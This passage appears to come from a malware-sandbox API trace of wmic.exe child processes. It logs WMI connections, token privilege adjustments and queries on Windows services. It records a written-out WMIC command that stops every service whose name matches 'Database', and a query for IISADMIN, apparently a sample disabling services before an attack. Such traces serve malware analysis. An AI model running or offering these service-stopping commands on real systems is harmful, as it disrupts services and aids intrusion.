(Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0297.888] free (_Block=0x78b9b8) [0297.889] CloseHandle (hObject=0x2f8) returned 1 [0297.889] lstrlenW (lpString="GET") returned 3 [0297.889] lstrlenW (lpString="call") returned 4 [0297.889] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0297.889] lstrlenW (lpString="LIST") returned 4 [0297.889] lstrlenW (lpString="call") returned 4 [0297.889] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0297.889] lstrlenW (lpString="SET") returned 3 [0297.889] lstrlenW (lpString="call") returned 4 [0297.889] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0297.889] lstrlenW (lpString="CALL") returned 4 [0297.889] lstrlenW (lpString="call") returned 4 [0297.889] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0297.889] ??0CHString@@QAE@XZ () returned 0x19f8c8 [0297.889] GetCurrentThreadId () returned 0x115c [0297.889] malloc (_Size=0xc) returned 0x78ae10 [0297.889] malloc (_Size=0xc) returned 0x78ae58 [0297.889] malloc (_Size=0xc) returned 0x78ae70 [0297.890] malloc (_Size=0xc) returned 0x78ae88 [0297.890] malloc (_Size=0xc) returned 0x789988 [0297.890] SysStringLen (param_1="\\\\") returned 0x2 [0297.890] SysStringLen (param_1="NQDPDE") returned 0x6 [0297.890] malloc (_Size=0xc) returned 0x78bee0 [0297.890] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0297.890] SysStringLen (param_1="\\") returned 0x1 [0297.890] malloc (_Size=0xc) returned 0x78bf40 [0297.890] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0297.890] SysStringLen (param_1="root\\cimv2") returned 0xa [0297.891] free (_Block=0x78bee0) [0297.891] free (_Block=0x789988) [0297.891] free (_Block=0x78ae88) [0297.891] free (_Block=0x78ae70) [0297.891] free (_Block=0x78ae58) [0297.891] free (_Block=0x78ae10) [0297.891] malloc (_Size=0xc) returned 0x78bf28 [0297.891] malloc (_Size=0xc) returned 0x78bfd0 [0297.891] malloc (_Size=0xc) returned 0x78be38 [0297.891] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6148b8, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x670cf0) returned 0x0 [0297.901] free (_Block=0x78be38) [0297.901] free (_Block=0x78bfd0) [0297.901] free (_Block=0x78bf28) [0297.901] CoSetProxyBlanket (pProxy=0x670cf0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0297.901] free (_Block=0x78bf40) [0297.901] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0297.901] ??0CHString@@QAE@XZ () returned 0x19f8c0 [0297.901] GetCurrentThreadId () returned 0x115c [0297.901] malloc (_Size=0x38) returned 0x78b9b8 [0297.902] malloc (_Size=0x28) returned 0x78b9f8 [0297.902] malloc (_Size=0x28) returned 0x78ba28 [0297.902] malloc (_Size=0x38) returned 0x78ba58 [0297.902] malloc (_Size=0x38) returned 0x78ba98 [0297.902] malloc (_Size=0x24) returned 0x78bad8 [0297.902] malloc (_Size=0xc) returned 0x78ae10 [0297.902] lstrlenA (lpString="") returned 0 [0297.902] malloc (_Size=0x2) returned 0x782788 [0297.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x782788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0297.902] free (_Block=0x782788) [0297.902] malloc (_Size=0x38) returned 0x78bb08 [0297.902] malloc (_Size=0x24) returned 0x78bb48 [0297.902] malloc (_Size=0xc) returned 0x78ae58 [0297.902] free (_Block=0x78ae10) [0297.902] IWbemServices:GetObject (in: This=0x670cf0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x19f898*=0x0, ppCallResult=0x0 | out: ppObject=0x19f898*=0x670360, ppCallResult=0x0) returned 0x0 [0297.969] malloc (_Size=0xc) returned 0x78ae70 [0297.969] IWbemClassObject:GetMethod (in: This=0x670360, wszName="stopservice", lFlags=0, ppInSignature=0x19f8b4, ppOutSignature=0x19f894 | out: ppInSignature=0x19f8b4*=0x0, ppOutSignature=0x19f894*=0x6737b8) returned 0x0 [0297.969] free (_Block=0x78ae70) [0297.969] IUnknown:Release (This=0x6737b8) returned 0x0 [0297.969] IUnknown:Release (This=0x670360) returned 0x0 [0297.971] ??0CHString@@QAE@XZ () returned 0x19f778 [0297.971] GetCurrentThreadId () returned 0x115c [0297.971] malloc (_Size=0xc) returned 0x78ae10 [0297.971] lstrlenA (lpString="") returned 0 [0297.971] malloc (_Size=0x2) returned 0x782788 [0297.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x782788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0297.971] free (_Block=0x782788) [0297.971] malloc (_Size=0xc) returned 0x78ae70 [0297.971] lstrlenA (lpString="") returned 0 [0297.971] malloc (_Size=0x2) returned 0x782788 [0297.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x782788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0297.971] free (_Block=0x782788) [0297.971] malloc (_Size=0xc) returned 0x78ae88 [0297.971] free (_Block=0x78ae70) [0297.971] malloc (_Size=0xc) returned 0x78ae70 [0297.971] lstrlenA (lpString="SELECT * FROM ") returned 14 [0297.971] malloc (_Size=0x1e) returned 0x78bb78 [0297.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x78bb78, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0297.971] free (_Block=0x78bb78) [0297.971] malloc (_Size=0xc) returned 0x789988 [0297.972] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0297.972] SysStringLen (param_1="Win32_Service") returned 0xd [0297.972] free (_Block=0x78ae70) [0297.972] malloc (_Size=0xc) returned 0x78ae70 [0297.972] malloc (_Size=0xc) returned 0x78c090 [0297.972] lstrlenA (lpString=" WHERE ") returned 7 [0297.972] malloc (_Size=0x10) returned 0x78c000 [0297.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x78c000, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0297.972] free (_Block=0x78c000) [0297.972] malloc (_Size=0xc) returned 0x78c078 [0297.972] SysStringLen (param_1=" WHERE ") returned 0x7 [0297.972] SysStringLen (param_1="name like '%%IISADMIN%%'") returned 0x18 [0297.972] malloc (_Size=0xc) returned 0x78c0a8 [0297.972] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0297.972] SysStringLen (param_1=" WHERE name like '%%IISADMIN%%'") returned 0x1f [0297.972] free (_Block=0x789988) [0297.972] free (_Block=0x78c078) [0297.972] free (_Block=0x78c090) [0297.973] free (_Block=0x78ae70) [0297.973] malloc (_Size=0xc) returned 0x78c078 [0297.973] IWbemServices:ExecQuery (in: This=0x670cf0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%IISADMIN%%'", lFlags=48, pCtx=0x0, ppEnum=0x19f784 | out: ppEnum=0x19f784*=0x673e88) returned 0x0 [0298.007] free (_Block=0x78c078) [0298.007] CoSetProxyBlanket (pProxy=0x673e88, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0298.045] IEnumWbemClassObject:Next (in: This=0x673e88, lTimeout=-1, uCount=0x1, apObjects=0x19f780, puReturned=0x19f770 | out: apObjects=0x19f780*=0x0, puReturned=0x19f770*=0x0) returned 0x1 [0299.289] IUnknown:Release (This=0x673e88) returned 0x0 [0299.291] free (_Block=0x78c0a8) [0299.291] free (_Block=0x78ae88) [0299.291] free (_Block=0x78ae10) [0299.291] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0299.291] free (_Block=0x78ae58) [0299.291] free (_Block=0x78bad8) [0299.291] free (_Block=0x78ba98) [0299.292] free (_Block=0x78ba58) [0299.292] free (_Block=0x78ba28) [0299.292] free (_Block=0x78b9f8) [0299.292] free (_Block=0x78bb48) [0299.292] free (_Block=0x78bb08) [0299.292] free (_Block=0x78b9b8) [0299.292] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0299.292] GetCurrentThreadId () returned 0x115c [0299.292] ??0CHString@@QAE@PBG@Z () returned 0x19f938 [0299.292] ??YCHString@@QAEABV0@PBG@Z () returned 0x19f938 [0299.292] malloc (_Size=0x800) returned 0x78c0c0 [0299.292] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x78c0c0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0299.292] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0299.292] malloc (_Size=0x1c) returned 0x78b9b8 [0299.292] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x78b9b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0299.292] __iob_func () returned 0x776f2608 [0299.293] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0299.293] __iob_func () returned 0x776f2608 [0299.293] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0299.293] free (_Block=0x78b9b8) [0299.293] free (_Block=0x78c0c0) [0299.293] ??1CHString@@QAE@XZ () returned 0x1 [0299.294] WbemLocator:IUnknown:Release (This=0x670cf0) returned 0x0 [0299.294] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0299.294] _kbhit () returned 0x0 [0299.298] free (_Block=0x782ee8) [0299.299] free (_Block=0x78ad20) [0299.299] free (_Block=0x78abd0) [0299.299] free (_Block=0x78ab88) [0299.299] free (_Block=0x78acc0) [0299.299] free (_Block=0x78b058) [0299.299] free (_Block=0x78b188) [0299.299] free (_Block=0x789da8) [0299.299] free (_Block=0x78b208) [0299.299] free (_Block=0x78adb0) [0299.299] free (_Block=0x782cc0) [0299.299] free (_Block=0x780520) [0299.299] free (_Block=0x78bc88) [0299.299] free (_Block=0x78ade0) [0299.299] free (_Block=0x78aeb8) [0299.299] free (_Block=0x78bc48) [0299.299] free (_Block=0x78bc08) [0299.299] free (_Block=0x78ae28) [0299.299] free (_Block=0x78aed0) [0299.299] free (_Block=0x78ae40) [0299.299] free (_Block=0x78bbd8) [0299.299] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0299.299] free (_Block=0x78b0f0) [0299.299] free (_Block=0x78ad08) [0299.299] free (_Block=0x780568) [0299.299] free (_Block=0x78ac00) [0299.299] free (_Block=0x78b1c8) [0299.299] free (_Block=0x78acf0) [0299.299] free (_Block=0x782aa0) [0299.300] free (_Block=0x7826b0) [0299.300] free (_Block=0x7826f8) [0299.300] free (_Block=0x782740) [0299.300] free (_Block=0x78aea0) [0299.300] free (_Block=0x7827c8) [0299.300] free (_Block=0x780508) [0299.300] free (_Block=0x782ba0) [0299.300] free (_Block=0x7804f0) [0299.300] free (_Block=0x782b00) [0299.300] free (_Block=0x7804d8) [0299.300] free (_Block=0x782a80) [0299.300] free (_Block=0x782908) [0299.300] free (_Block=0x782920) [0299.300] free (_Block=0x7828d0) [0299.300] free (_Block=0x7828e8) [0299.300] free (_Block=0x782940) [0299.300] free (_Block=0x782958) [0299.300] free (_Block=0x7804a0) [0299.300] free (_Block=0x7804b8) [0299.300] free (_Block=0x782860) [0299.300] free (_Block=0x782878) [0299.300] free (_Block=0x782828) [0299.300] free (_Block=0x782840) [0299.300] free (_Block=0x782898) [0299.301] free (_Block=0x7828b0) [0299.301] free (_Block=0x7827f0) [0299.301] free (_Block=0x782808) [0299.301] free (_Block=0x7827a0) [0299.301] free (_Block=0x781200) [0299.301] free (_Block=0x78afd0) [0299.301] WbemLocator:IUnknown:Release (This=0x6148b8) returned 0x2 [0299.301] WbemLocator:IUnknown:Release (This=0x61b088) returned 0x0 [0299.301] WbemLocator:IUnknown:Release (This=0x6148b8) returned 0x1 [0299.302] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0299.302] WbemLocator:IUnknown:Release (This=0x6148b8) returned 0x0 [0299.302] free (_Block=0x78aba0) [0299.302] free (_Block=0x78ac90) [0299.302] free (_Block=0x782b80) [0299.302] free (_Block=0x78ab58) [0299.302] free (_Block=0x78aca8) [0299.302] free (_Block=0x782bc0) [0299.302] free (_Block=0x78ac30) [0299.302] free (_Block=0x78ab10) [0299.302] free (_Block=0x7829a0) [0299.302] free (_Block=0x78adc8) [0299.302] free (_Block=0x78adf8) [0299.302] free (_Block=0x7829c0) [0299.302] free (_Block=0x78ab70) [0299.302] free (_Block=0x78ab28) [0299.302] free (_Block=0x782ca0) [0299.302] free (_Block=0x78ac78) [0299.302] free (_Block=0x78ad98) [0299.302] free (_Block=0x782a00) [0299.302] free (_Block=0x78abe8) [0299.302] free (_Block=0x78ad50) [0299.302] free (_Block=0x782c60) [0299.303] free (_Block=0x78acd8) [0299.303] free (_Block=0x78ab40) [0299.303] free (_Block=0x782b20) [0299.303] free (_Block=0x7897f0) [0299.303] free (_Block=0x78ad38) [0299.303] free (_Block=0x782d60) [0299.303] free (_Block=0x78ac18) [0299.303] free (_Block=0x78ac48) [0299.303] free (_Block=0x782b60) [0299.303] free (_Block=0x78ad68) [0299.303] free (_Block=0x78abb8) [0299.303] free (_Block=0x782a40) [0299.303] free (_Block=0x78ad80) [0299.303] free (_Block=0x78ac60) [0299.303] free (_Block=0x782a60) [0299.303] free (_Block=0x7899b8) [0299.303] free (_Block=0x7898e0) [0299.303] free (_Block=0x782ae0) [0299.303] free (_Block=0x7898b0) [0299.303] free (_Block=0x789850) [0299.303] free (_Block=0x782d20) [0299.303] free (_Block=0x789898) [0299.303] free (_Block=0x789940) [0299.303] free (_Block=0x782ac0) [0299.304] free (_Block=0x789970) [0299.304] free (_Block=0x789820) [0299.304] free (_Block=0x782a20) [0299.304] free (_Block=0x789838) [0299.304] free (_Block=0x789868) [0299.304] free (_Block=0x782be0) [0299.304] free (_Block=0x789928) [0299.304] free (_Block=0x789958) [0299.304] free (_Block=0x7829e0) [0299.304] free (_Block=0x7898f8) [0299.304] free (_Block=0x789910) [0299.304] free (_Block=0x782c20) [0299.304] free (_Block=0x7899a0) [0299.304] free (_Block=0x7898c8) [0299.304] free (_Block=0x782c80) [0299.304] free (_Block=0x789880) [0299.304] free (_Block=0x789808) [0299.304] free (_Block=0x782d40) [0299.304] CoUninitialize () [0299.339] exit (_Code=0) [0299.339] free (_Block=0x78aee8) [0299.339] free (_Block=0x781008) [0299.339] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0299.339] free (_Block=0x782e10) [0299.339] free (_Block=0x7827e0) [0299.340] free (_Block=0x780fe8) [0299.340] free (_Block=0x780fc8) [0299.340] free (_Block=0x780f98) [0299.340] free (_Block=0x780f78) [0299.340] free (_Block=0x780f48) [0299.340] free (_Block=0x780f08) [0299.340] free (_Block=0x780ee8) [0299.340] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0299.340] free (_Block=0x782ce0) Thread: id = 282 os_tid = 0x1110 Thread: id = 283 os_tid = 0x5a4 Thread: id = 284 os_tid = 0xe34 Thread: id = 285 os_tid = 0x564 Process: id = "26" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x1f0a6000" os_pid = "0xf70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Database%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 287 os_tid = 0x12ac [0299.531] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0299.531] __set_app_type (_Type=0x1) [0299.531] __p__fmode () returned 0x776f3c14 [0299.531] __p__commode () returned 0x776f49ec [0299.531] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0299.531] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0299.531] ??0CHString@@QAE@XZ () returned 0xa685ec [0299.532] malloc (_Size=0x18) returned 0x34e0ee8 [0299.532] malloc (_Size=0x38) returned 0x34e0f08 [0299.532] malloc (_Size=0x28) returned 0x34e0f48 [0299.532] malloc (_Size=0x18) returned 0x34e0f78 [0299.532] malloc (_Size=0x24) returned 0x34e0f98 [0299.532] malloc (_Size=0x18) returned 0x34e0fc8 [0299.532] malloc (_Size=0x18) returned 0x34e0fe8 [0299.532] ??0CHString@@QAE@XZ () returned 0xa688fc [0299.532] malloc (_Size=0x18) returned 0x34e1008 [0299.532] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0299.532] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0299.532] _onexit (_Func=0xa5f370) returned 0xa5f370 [0299.532] _onexit (_Func=0xa5f380) returned 0xa5f380 [0299.532] _onexit (_Func=0xa5f390) returned 0xa5f390 [0299.537] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0299.537] ResolveDelayLoadedAPI () returned 0x74a22590 [0299.537] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0299.543] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0299.558] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x35248f0) returned 0x0 [0299.599] GetCurrentProcess () returned 0xffffffff [0299.599] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x323fdfc | out: TokenHandle=0x323fdfc*=0x194) returned 1 [0299.599] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x323fdf8 | out: TokenInformation=0x0, ReturnLength=0x323fdf8) returned 0 [0299.599] malloc (_Size=0x118) returned 0x34e26b0 [0299.599] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x34e26b0, TokenInformationLength=0x118, ReturnLength=0x323fdf8 | out: TokenInformation=0x34e26b0, ReturnLength=0x323fdf8) returned 1 [0299.599] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x34e26b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0299.599] free (_Block=0x34e26b0) [0299.599] CloseHandle (hObject=0x194) returned 1 [0299.599] malloc (_Size=0x40) returned 0x34e26b0 [0299.599] malloc (_Size=0x40) returned 0x34e26f8 [0299.599] malloc (_Size=0x40) returned 0x34e2740 [0299.599] SetThreadUILanguage (LangId=0x0) returned 0x3090409 [0299.604] _vsnwprintf (in: _Buffer=0x34e2740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x323fd84 | out: _Buffer="ms_409") returned 6 [0299.605] malloc (_Size=0x20) returned 0x34e1200 [0299.605] GetComputerNameW (in: lpBuffer=0x34e1200, nSize=0x323fde8 | out: lpBuffer="NQDPDE", nSize=0x323fde8) returned 1 [0299.605] lstrlenW (lpString="NQDPDE") returned 6 [0299.605] malloc (_Size=0xe) returned 0x34e2788 [0299.605] lstrlenW (lpString="NQDPDE") returned 6 [0299.605] ResolveDelayLoadedAPI () returned 0x7444db00 [0299.605] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x323fdfc | out: lpNameBuffer=0x0, nSize=0x323fdfc) returned 0x309f000 [0299.609] GetLastError () returned 0xea [0299.609] malloc (_Size=0x1e) returned 0x34e27a0 [0299.609] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34e27a0, nSize=0x323fdfc | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x323fdfc) returned 0x1 [0299.609] lstrlenW (lpString="") returned 0 [0299.609] lstrlenW (lpString="NQDPDE") returned 6 [0299.609] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0299.612] lstrlenW (lpString=".") returned 1 [0299.612] lstrlenW (lpString="NQDPDE") returned 6 [0299.612] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0299.612] lstrlenW (lpString="LOCALHOST") returned 9 [0299.612] lstrlenW (lpString="NQDPDE") returned 6 [0299.612] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0299.612] lstrlenW (lpString="NQDPDE") returned 6 [0299.612] lstrlenW (lpString="NQDPDE") returned 6 [0299.612] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0299.612] free (_Block=0x34e2788) [0299.612] lstrlenW (lpString="NQDPDE") returned 6 [0299.612] malloc (_Size=0xe) returned 0x34e2788 [0299.612] lstrlenW (lpString="NQDPDE") returned 6 [0299.612] lstrlenW (lpString="NQDPDE") returned 6 [0299.612] malloc (_Size=0xe) returned 0x34e27c8 [0299.613] lstrlenW (lpString="NQDPDE") returned 6 [0299.613] malloc (_Size=0x4) returned 0x34e27e0 [0299.613] malloc (_Size=0xc) returned 0x34e27f0 [0299.613] ResolveDelayLoadedAPI () returned 0x7745b870 [0299.625] malloc (_Size=0x18) returned 0x34e2808 [0299.625] malloc (_Size=0xc) returned 0x34e2828 [0299.625] SysStringLen (param_1="IDENTIFY") returned 0x8 [0299.625] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0299.625] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0299.625] SysStringLen (param_1="IDENTIFY") returned 0x8 [0299.625] malloc (_Size=0x18) returned 0x34e2840 [0299.625] malloc (_Size=0xc) returned 0x34e2860 [0299.625] SysStringLen (param_1="IMPERSONATE") returned 0xb [0299.625] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0299.625] SysStringLen (param_1="IMPERSONATE") returned 0xb [0299.625] SysStringLen (param_1="IDENTIFY") returned 0x8 [0299.625] SysStringLen (param_1="IDENTIFY") returned 0x8 [0299.626] SysStringLen (param_1="IMPERSONATE") returned 0xb [0299.626] malloc (_Size=0x18) returned 0x34e2878 [0299.626] malloc (_Size=0xc) returned 0x34e2898 [0299.626] SysStringLen (param_1="DELEGATE") returned 0x8 [0299.626] SysStringLen (param_1="IDENTIFY") returned 0x8 [0299.626] SysStringLen (param_1="DELEGATE") returned 0x8 [0299.626] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0299.626] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0299.626] SysStringLen (param_1="DELEGATE") returned 0x8 [0299.626] malloc (_Size=0x18) returned 0x34e28b0 [0299.626] malloc (_Size=0xc) returned 0x34e28d0 [0299.626] malloc (_Size=0x18) returned 0x34e28e8 [0299.626] malloc (_Size=0xc) returned 0x34e2908 [0299.626] SysStringLen (param_1="NONE") returned 0x4 [0299.626] SysStringLen (param_1="DEFAULT") returned 0x7 [0299.626] SysStringLen (param_1="DEFAULT") returned 0x7 [0299.626] SysStringLen (param_1="NONE") returned 0x4 [0299.626] malloc (_Size=0x18) returned 0x34e2920 [0299.626] malloc (_Size=0xc) returned 0x34e2940 [0299.626] SysStringLen (param_1="CONNECT") returned 0x7 [0299.627] SysStringLen (param_1="DEFAULT") returned 0x7 [0299.627] malloc (_Size=0x18) returned 0x34e2958 [0299.627] malloc (_Size=0xc) returned 0x34e04a0 [0299.627] SysStringLen (param_1="CALL") returned 0x4 [0299.627] SysStringLen (param_1="DEFAULT") returned 0x7 [0299.628] SysStringLen (param_1="CALL") returned 0x4 [0299.628] SysStringLen (param_1="CONNECT") returned 0x7 [0299.628] malloc (_Size=0x18) returned 0x34e04b8 [0299.628] malloc (_Size=0xc) returned 0x34e04d8 [0299.628] SysStringLen (param_1="PKT") returned 0x3 [0299.628] SysStringLen (param_1="DEFAULT") returned 0x7 [0299.628] SysStringLen (param_1="PKT") returned 0x3 [0299.628] SysStringLen (param_1="NONE") returned 0x4 [0299.628] SysStringLen (param_1="NONE") returned 0x4 [0299.628] SysStringLen (param_1="PKT") returned 0x3 [0299.628] malloc (_Size=0x18) returned 0x34e2a60 [0299.628] malloc (_Size=0xc) returned 0x34e04f0 [0299.628] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0299.628] SysStringLen (param_1="DEFAULT") returned 0x7 [0299.628] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0299.628] SysStringLen (param_1="NONE") returned 0x4 [0299.628] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0299.628] SysStringLen (param_1="PKT") returned 0x3 [0299.628] SysStringLen (param_1="PKT") returned 0x3 [0299.628] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0299.628] malloc (_Size=0x18) returned 0x34e2a00 [0299.628] malloc (_Size=0xc) returned 0x34e0508 [0299.628] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0299.628] SysStringLen (param_1="DEFAULT") returned 0x7 